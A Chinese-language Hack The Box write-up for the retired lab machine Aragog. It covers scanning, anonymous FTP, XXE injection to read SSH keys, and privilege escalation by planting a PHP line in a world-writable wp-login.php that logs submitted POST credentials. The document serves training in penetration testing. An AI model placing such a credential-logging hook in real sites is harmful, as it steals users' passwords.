HTB-靶机-Aragog
本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关
靶机是作者购买VIP使用退役靶机操作,显示IP地址为10.10.10.78
本次使用https://github.com/Tib3rius/AutoRecon 进行自动化全方位扫描
执行命令 autorecon 10.10.10.78 -o ./Aragog-autorecon
开放了3个端口,根据nmap的扫描结果,开放的ftp服务可以匿名登录并且上面有个文件test.txt将其下载下来得到如下信息
看此信息是个xml类型的文件内容,有可能跟xxe有关,再看看爆破的目录效果
发现了个有用的hosts.php文件,访问看看
没啥重要信息,想想把上面结果起来看看,使用burpsuite重放请求,具体关于xxe的攻击参考:https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20Injection
根据上面显示,增加xxe攻击代码,构造语句,得出下面测试代码
知道了有两个用户,读取每个用户的密钥试试,但是只成功了一个,具体如下
将得到的密钥复制到本地给权限600然后ssh登录到目标靶机
准备开始提权了,查看了目标靶机的系统内核和所使用的操作系统
确认系统架构之后开始监控下系统进程运行的情况,这里使用pspy这个款工具,前面也介绍到了,链接:https://github.com/DominicBreuker/pspy
确认每分钟都有计划任务在执行目标靶机的登录功能,查看下网站根目录发现存在dev_wiki这个目录,访问的时候会自动跳转一个域名,通过本地绑定hosts来完成正常访问,没发现啥东西,还是直接修改上述计划任务执行的wp-login.php文件,因为目录dev_wiki是777权限,所有人都可以进行修改,修改成如下代码
<?php file_put_contents("bmfx.log", print_r($_POST, true)); ?>
最终得到密码
使用su直接切换至root用户
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· AI与.NET技术实操系列(二):开始使用ML.NET
· 记一次.NET内存居高不下排查解决与启示
· 探究高空视频全景AR技术的实现原理
· 理解Rust引用及其生命周期标识(上)
· 浏览器原生「磁吸」效果!Anchor Positioning 锚点定位神器解析
· DeepSeek 开源周回顾「GitHub 热点速览」
· 物流快递公司核心技术能力-地址解析分单基础技术分享
· .NET 10首个预览版发布:重大改进与新特性概览!
· AI与.NET技术实操系列(二):开始使用ML.NET
· 单线程的Redis速度为什么快?